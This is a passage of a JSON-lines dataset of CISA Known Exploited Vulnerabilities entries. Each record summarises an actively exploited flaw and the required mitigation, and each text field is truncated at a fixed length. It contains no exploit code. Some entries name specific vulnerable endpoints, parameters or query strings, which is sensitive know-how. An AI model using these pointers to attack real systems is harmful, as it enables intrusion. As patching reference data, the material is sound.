"cve_id": "CVE-2026-24061", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-21509", "text": "Microsoft Office Security Feature Bypass Vulnerability\n\nAffected: Microsoft Office\n\nMicrosoft Office contains a security feature bypass vulnerability in which reliance on untrusted inputs in a security decision in Microsoft Office could allow an unauthorized attacker to bypass a security feature locally. Some of the impacted product(s) could be end-of-life (EoL) and/or end-of-service (EoS). Users are advised to discontinue use and/or transition to a supported version.\n\nRequired Action: Apply mit", "cve_id": "CVE-2026-21509", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-37079", "text": "Broadcom VMware vCenter Server Out-of-bounds Write Vulnerability\n\nAffected: Broadcom VMware vCenter Server\n\nBroadcom VMware vCenter Server contains an out-of-bounds write vulnerability in the implementation of the DCERPC protocol. This could allow a malicious actor with network access to vCenter Server to send specially crafted network packets, potentially leading to remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud", "cve_id": "CVE-2024-37079", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-68645", "text": "Synacor Zimbra Collaboration Suite (ZCS) PHP Remote File Inclusion Vulnerability\n\nAffected: Synacor Zimbra Collaboration Suite (ZCS)\n\nSynacor Zimbra Collaboration Suite (ZCS) contains a PHP remote file inclusion vulnerability that could allow for remote attackers to craft requests to the /h/rest endpoint to influence internal request dispatching, allowing inclusion of arbitrary files from the WebRoot directory.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 2", "cve_id": "CVE-2025-68645", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-34026", "text": "Versa Concerto Improper Authentication Vulnerability\n\nAffected: Versa Concerto\n\nVersa Concerto SD-WAN orchestration platform contains an improper authentication vulnerability in the Traefik reverse proxy configuration, allowing at attacker to access administrative endpoints. The internal Actuator endpoint can be leveraged for access to heap dumps and trace logs.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue us", "cve_id": "CVE-2025-34026", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-31125", "text": "Vite Vitejs Improper Access Control Vulnerability\n\nAffected: Vite Vitejs\n\nVite Vitejs contains an improper access control vulnerability that exposes content of non-allowed files using ?inline&import or ?raw?import. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigat", "cve_id": "CVE-2025-31125", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-54313", "text": "Prettier eslint-config-prettier Embedded Malicious Code Vulnerability\n\nAffected: Prettier eslint-config-prettier\n\nPrettier eslint-config-prettier contains an embedded malicious code vulnerability. Installing an affected package executes an install.js file that launches the node-gyp.dll malware on Windows.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): ", "cve_id": "CVE-2025-54313", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-20045", "text": "Cisco Unified Communications Products Code Injection Vulnerability\n\nAffected: Cisco Unified Communications Manager\n\nCisco Unified Communications Manager (Unified CM), Cisco Unified Communications Manager Session Management Edition (Unified CM SME), Cisco Unified Communications Manager IM & Presence Service (Unified CM IM&P), Cisco Unity Connection, and Cisco Webex Calling Dedicated Instance contain a code injection vulnerability that could allow the attacker to obtain user-level access to the un", "cve_id": "CVE-2026-20045", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-20805", "text": "Microsoft Windows Information Disclosure Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Desktop Windows Manager contains an information disclosure vulnerability that allows an authorized attacker to disclose information locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-200\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2026-20805", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-8110", "text": "Gogs Path Traversal Vulnerability\n\nAffected: Gogs Gogs\n\nGogs contains a path traversal vulnerability affecting improper Symbolic link handling in the PutContents API that could allow for code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-8110", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-37164", "text": "Hewlett Packard Enterprise (HPE) OneView Code Injection Vulnerability\n\nAffected: Hewlett Packard Enterprise (HPE) OneView\n\nHewlett Packard Enterprise (HPE) OneView contains a code injection vulnerability that allows a remote unauthenticated user to perform remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-94\n\n[Source: CISA Known", "cve_id": "CVE-2025-37164", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-14847", "text": "MongoDB and MongoDB Server Improper Handling of Length Parameter Inconsistency Vulnerability\n\nAffected: MongoDB MongoDB and MongoDB Server\n\nMongoDB Server contains an improper handling of length parameter inconsistency vulnerability in Zlib compressed protocol headers. This vulnerability may allow a read of uninitialized heap memory by an unauthenticated client.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue us", "cve_id": "CVE-2025-14847", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-14733", "text": "WatchGuard Firebox Out of Bounds Write Vulnerability\n\nAffected: WatchGuard Firebox\n\nWatchGuard Fireware OS iked process contains an out of bounds write vulnerability in the OS iked process. This vulnerability may allow a remote unauthenticated attacker to execute arbitrary code and affects both the mobile user VPN with IKEv2 and the branch office VPN using IKEv2 when configured with a dynamic gateway peer.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 g", "cve_id": "CVE-2025-14733", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-59374", "text": "ASUS Live Update Embedded Malicious Code Vulnerability\n\nAffected: ASUS Live Update\n\nASUS Live Update contains an embedded malicious code vulnerability client were distributed with unauthorized modifications introduced through a supply chain compromise. The modified builds could cause devices meeting specific targeting conditions to perform unintended actions. The impacted product could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.\n\nRequired Actio", "cve_id": "CVE-2025-59374", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-40602", "text": "SonicWall SMA1000 Missing Authorization Vulnerability\n\nAffected: SonicWall SMA1000 appliance\n\nSonicWall SMA1000 contains a missing authorization vulnerability that could allow for privilege escalation appliance management console (AMC) of affected devices.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable\n\nCWE(s): CWE-862, CWE-250\n\n[Source: CISA Known Exploited Vul", "cve_id": "CVE-2025-40602", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-20393", "text": "Cisco Multiple Products Improper Input Validation Vulnerability\n\nAffected: Cisco Multiple Products\n\nCisco Secure Email Gateway, Secure Email, AsyncOS Software, and Web Manager appliances contains an improper input validation vulnerability that allows threat actors to execute arbitrary commands with root privileges on the underlying operating system of an affected appliance.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or di", "cve_id": "CVE-2025-20393", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-59718", "text": "Fortinet Multiple Products Improper Verification of Cryptographic Signature Vulnerability\n\nAffected: Fortinet Multiple Products\n\nFortinet FortiOS, FortiSwitchMaster, FortiProxy, and FortiWeb contain an improper verification of cryptographic signature vulnerability that may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML message. Please be aware that CVE-2025-59719 pertains to the same problem and is mentioned in the same vendor advisory. Ens", "cve_id": "CVE-2025-59718", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-14611", "text": "Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability\n\nAffected: Gladinet CentreStack and Triofox\n\nGladinet CentreStack and TrioFox contain a hardcoded cryptographic keys vulnerability for their implementation of the AES cryptoscheme. This vulnerability degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication.\n\nRequired Action: Apply mitigations per vendor", "cve_id": "CVE-2025-14611", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-43529", "text": "Apple Multiple Products Use-After-Free WebKit Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, and other Apple products contain a use-after-free vulnerability in WebKit. Processing maliciously crafted web content may lead to memory corruption. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply mitigations per vendor instructions,", "cve_id": "CVE-2025-43529", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-14174", "text": "Google Chromium Out of Bounds Memory Access Vulnerability\n\nAffected: Google Chromium\n\nGoogle Chromium contains an out of bounds memory access vulnerability in ANGLE that could allow a remote attacker to perform out of bounds memory access via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-", "cve_id": "CVE-2025-14174", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-58360", "text": "OSGeo GeoServer Improper Restriction of XML External Entity Reference Vulnerability\n\nAffected: OSGeo GeoServer\n\nOSGeo GeoServer contains an improper restriction of XML external entity reference vulnerability that occurs when the application accepts XML input through a specific endpoint /geoserver/wms operation GetMap and could allow an attacker to define external entities within the XML request.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for", "cve_id": "CVE-2025-58360", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-6218", "text": "RARLAB WinRAR Path Traversal Vulnerability\n\nAffected: RARLAB WinRAR\n\nRARLAB WinRAR contains a path traversal vulnerability allowing an attacker to execute code in the context of the current user.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-6218", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-62221", "text": "Microsoft Windows Use After Free Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Cloud Files Mini Filter Driver contains a use after free vulnerability that can allow an authorized attacker to elevate privileges locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-62221", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-66644", "text": "Array Networks ArrayOS AG OS Command Injection Vulnerability\n\nAffected: Array Networks ArrayOS AG\n\nArray Networks ArrayOS AG contains an OS command injection vulnerability that could allow an attacker to execute arbitrary commands.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-66644", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-55182", "text": "Meta React Server Components Remote Code Execution Vulnerability\n\nAffected: Meta React Server Components\n\nMeta React Server Components contains a remote code execution vulnerability that could allow unauthenticated remote code execution by exploiting a flaw in how React decodes payloads sent to React Server Function endpoints. Please note CVE-2025-66478 has been rejected, but it is associated with CVE-2025- 55182.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD", "cve_id": "CVE-2025-55182", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-48633", "text": "Android Framework Information Disclosure Vulnerability\n\nAffected: Android Framework\n\nAndroid Framework contains an unspecified vulnerability that allows for information disclosure.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-48633", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-48572", "text": "Android Framework Privilege Escalation Vulnerability\n\nAffected: Android Framework\n\nAndroid Framework contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-48572", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-61757", "text": "Oracle Fusion Middleware Missing Authentication for Critical Function Vulnerability\n\nAffected: Oracle Fusion Middleware\n\nOracle Fusion Middleware contains a missing authentication for critical function vulnerability, allowing unauthenticated remote attackers to take over Identity Manager.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-306\n\n[Source:", "cve_id": "CVE-2025-61757", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-13223", "text": "Google Chromium V8 Type Confusion Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 contains a type confusion vulnerability that allows for heap corruption.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-843\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-13223", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-58034", "text": "Fortinet FortiWeb OS Command Injection Vulnerability\n\nAffected: Fortinet FortiWeb\n\nFortinet FortiWeb contains an OS command Injection vulnerability that may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-78\n\n[Source: CISA", "cve_id": "CVE-2025-58034", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-64446", "text": "Fortinet FortiWeb Path Traversal Vulnerability\n\nAffected: Fortinet FortiWeb\n\nFortinet FortiWeb contains a relative path traversal vulnerability that may allow an unauthenticated attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-23\n\n[Source: CISA Known Exploit", "cve_id": "CVE-2025-64446", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-12480", "text": "Gladinet Triofox Improper Access Control Vulnerability\n\nAffected: Gladinet Triofox\n\nGladinet Triofox contains an improper access control vulnerability that allows access to initial setup pages even after setup is complete.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-12480", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-62215", "text": "Microsoft Windows Race Condition Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Kernel contains a race condition vulnerability that allows a local attacker with low-level privileges to escalate privileges. Successful exploitation of this vulnerability could enable the attacker to gain SYSTEM-level access.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavail", "cve_id": "CVE-2025-62215", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-9242", "text": "WatchGuard Firebox Out-of-Bounds Write Vulnerability\n\nAffected: WatchGuard Firebox\n\nWatchGuard Firebox contains an out-of-bounds write vulnerability in the OS iked process that may allow a remote unauthenticated attacker to execute arbitrary code.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Cata", "cve_id": "CVE-2025-9242", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-21042", "text": "Samsung Mobile Devices Out-of-Bounds Write Vulnerability\n\nAffected: Samsung Mobile Devices\n\nSamsung mobile devices contain an out-of-bounds write vulnerability in libimagecodec.quram.so. This vulnerability could allow remote attackers to execute arbitrary code.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulner", "cve_id": "CVE-2025-21042", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-48703", "text": "CWP Control Web Panel OS Command Injection Vulnerability\n\nAffected: CWP Control Web Panel\n\nCWP Control Web Panel (formerly CentOS Web Panel) contains an OS command Injection vulnerability that allows unauthenticated remote code execution via shell metacharacters in the t_total parameter in a filemanager changePerm request. A valid non-root username must be known.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue u", "cve_id": "CVE-2025-48703", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-11371", "text": "Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability\n\nAffected: Gladinet CentreStack and Triofox\n\nGladinet CentreStack and Triofox contains a files or directories accessible to external parties vulnerability that allows unintended disclosure of system files.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CW", "cve_id": "CVE-2025-11371", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-41244", "text": "Broadcom VMware Aria Operations and VMware Tools Privilege Defined with Unsafe Actions Vulnerability\n\nAffected: Broadcom VMware Aria Operations and VMware Tools\n\nBroadcom VMware Aria Operations and VMware Tools contain a privilege defined with unsafe actions vulnerability. A malicious local actor with non-administrative privileges having access to a VM with VMware Tools installed and managed by Aria Operations with SDMP enabled may exploit this vulnerability to escalate privileges to root on the", "cve_id": "CVE-2025-41244", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24893", "text": "XWiki Platform Eval Injection Vulnerability\n\nAffected: XWiki Platform\n\nXWiki Platform contains an eval injection vulnerability that could allow any guest to perform arbitrary remote code execution through a request to SolrSearch.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-95\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-24893", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-6204", "text": "Dassault Systèmes DELMIA Apriso Code Injection Vulnerability\n\nAffected: Dassault Systèmes DELMIA Apriso\n\nDassault Systèmes DELMIA Apriso contains a code injection vulnerability that could allow an attacker to execute arbitrary code.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-6204", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-6205", "text": "Dassault Systèmes DELMIA Apriso Missing Authorization Vulnerability\n\nAffected: Dassault Systèmes DELMIA Apriso\n\nDassault Systèmes DELMIA Apriso contains a missing authorization vulnerability that could allow an attacker to gain privileged access to the application.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-862\n\n[Source: CISA Known Exploited Vu", "cve_id": "CVE-2025-6205", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-54236", "text": "Adobe Commerce and Magento Improper Input Validation Vulnerability\n\nAffected: Adobe Commerce and Magento\n\nAdobe Commerce and Magento Open Source contain an improper input validation vulnerability that could allow an attacker to take over customer accounts through the Commerce REST API.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-20\n\n[Source: CIS", "cve_id": "CVE-2025-54236", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-59287", "text": "Microsoft Windows Server Update Service (WSUS) Deserialization of Untrusted Data Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Server Update Service (WSUS) contains a deserialization of untrusted data vulnerability that allows for remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploite", "cve_id": "CVE-2025-59287", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-61932", "text": "Motex LANSCOPE Endpoint Manager Improper Verification of Source of a Communication Channel Vulnerability\n\nAffected: Motex LANSCOPE Endpoint Manager\n\nMotex LANSCOPE Endpoint Manager contains an improper verification of source of a communication channel vulnerability allowing an attacker to execute arbitrary code by sending specially crafted packets.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the produ", "cve_id": "CVE-2025-61932", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-2746", "text": "Kentico Xperience CMS Authentication Bypass Using an Alternate Path or Channel Vulnerability\n\nAffected: Kentico Xperience CMS\n\nKentico Xperience CMS contains an authentication bypass using an alternate path or channel vulnerability that could allow an attacker to control administrative objects.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-288\n\n[S", "cve_id": "CVE-2025-2746", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-33073", "text": "Microsoft Windows SMB Client Improper Access Control Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows SMB Client contains an improper access control vulnerability that could allow for privilege escalation. An attacker could execute a specially crafted malicious script to coerce the victim machine to connect back to the attack system using SMB and authenticate.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or dis", "cve_id": "CVE-2025-33073", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-61884", "text": "Oracle E-Business Suite Server-Side Request Forgery (SSRF) Vulnerability\n\nAffected: Oracle E-Business Suite\n\nOracle E-Business Suite contains a server-side request forgery (SSRF) vulnerability in the Runtime component of Oracle Configurator. This vulnerability is remotely exploitable without authentication.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nRansom", "cve_id": "CVE-2025-61884", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-54253", "text": "Adobe Experience Manager Forms Code Execution Vulnerability\n\nAffected: Adobe Experience Manager (AEM) Forms\n\nAdobe Experience Manager Forms in JEE contains an unspecified vulnerability that allows for arbitrary code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-54253", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-47827", "text": "IGEL OS Use of a Key Past its Expiration Date Vulnerability\n\nAffected: IGEL IGEL OS\n\nIGEL OS contains a use of a key past its expiration date vulnerability that allows for Secure Boot bypass. The igel-flash-driver module improperly verifies a cryptographic signature. Ultimately, a crafted root filesystem can be mounted from an unverified SquashFS image.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the ", "cve_id": "CVE-2025-47827", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24990", "text": "Microsoft Windows Untrusted Pointer Dereference Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Agere Modem Driver contains an untrusted pointer dereference vulnerability that allows for privilege escalation. An attacker who successfully exploited this vulnerability could gain administrator privileges.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable", "cve_id": "CVE-2025-24990", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-59230", "text": "Microsoft Windows Improper Access Control Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows contains an improper access control vulnerability in Windows Remote Access Connection Manager which could allow an authorized attacker to elevate privileges locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploite", "cve_id": "CVE-2025-59230", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-27915", "text": "Synacor Zimbra Collaboration Suite (ZCS) Cross-site Scripting Vulnerability\n\nAffected: Synacor Zimbra Collaboration Suite (ZCS)\n\nSynacor Zimbra Collaboration Suite (ZCS) contains a cross-site scripting vulnerability that exists in the Classic Web Client due to insufficient sanitization of HTML content in ICS files. When a user views an e-mail message containing a malicious ICS entry, its embedded JavaScript executes via an ontoggle event inside a tag. This allows an attacker to run arbitrary Jav", "cve_id": "CVE-2025-27915", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-61882", "text": "Oracle E-Business Suite Unspecified Vulnerability\n\nAffected: Oracle E-Business Suite\n\nOracle E-Business Suite contains an unspecified vulnerability in the BI Publisher Integration component. The vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing. Successful attacks can result in takeover of Oracle Concurrent Processing.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud ser", "cve_id": "CVE-2025-61882", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-21043", "text": "Samsung Mobile Devices Out-of-Bounds Write Vulnerability\n\nAffected: Samsung Mobile Devices\n\nSamsung mobile devices contain an out-of-bounds write vulnerability in libimagecodec.quram.so which allows remote attackers to execute arbitrary code.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-21043", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-4008", "text": "Smartbedded Meteobridge Command Injection Vulnerability\n\nAffected: Smartbedded Meteobridge\n\nSmartbedded Meteobridge contains a command injection vulnerability that could allow remote unauthenticated attackers to gain arbitrary command execution with elevated privileges (root) on affected devices.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-306, ", "cve_id": "CVE-2025-4008", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-32463", "text": "Sudo Inclusion of Functionality from Untrusted Control Sphere Vulnerability\n\nAffected: Sudo Sudo\n\nSudo contains an inclusion of functionality from untrusted control sphere vulnerability. This vulnerability could allow local attacker to leverage sudo’s -R (--chroot) option to run arbitrary commands as root, even if they are not listed in the sudoers file.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the", "cve_id": "CVE-2025-32463", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-59689", "text": "Libraesva Email Security Gateway Command Injection Vulnerability\n\nAffected: Libraesva Email Security Gateway\n\nLibraesva Email Security Gateway (ESG) contains a command injection vulnerability which allows command injection via a compressed e-mail attachment.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-77\n\n[Source: CISA Known Exploited Vulnerabil", "cve_id": "CVE-2025-59689", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-10035", "text": "Fortra GoAnywhere MFT Deserialization of Untrusted Data Vulnerability\n\nAffected: Fortra GoAnywhere MFT\n\nFortra GoAnywhere MFT contains a deserialization of untrusted data vulnerability allows an actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mit", "cve_id": "CVE-2025-10035", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-20352", "text": "Cisco IOS and IOS XE Software SNMP Denial of Service and Remote Code Execution Vulnerability\n\nAffected: Cisco IOS and IOS XE\n\nCisco IOS and IOS XE contains a stack-based buffer overflow vulnerability in the Simple Network Management Protocol (SNMP) subsystem that could allow for denial of service or remote code execution. A successful exploit could allow a low-privileged attacker to cause the affected system to reload, resulting in a DoS condition, or allow a high-privileged attacker to execute ", "cve_id": "CVE-2025-20352", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-20362", "text": "Cisco Secure Firewall Adaptive Security (ASA) Appliance and Secure Firewall Threat Defense (FTD) Missing Authorization Vulnerability\n\nAffected: Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense\n\nCisco Secure Firewall Adaptive Security (ASA) Appliance and Secure Firewall Threat Defense (FTD) Software VPN Web Server contain a missing authorization vulnerability. This vulnerability could be chained with CVE-2025-20333.\n\nRequired Action: The KEV due date refers to ", "cve_id": "CVE-2025-20362", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-20333", "text": "Cisco Secure Firewall Adaptive Security Appliance (ASA) and 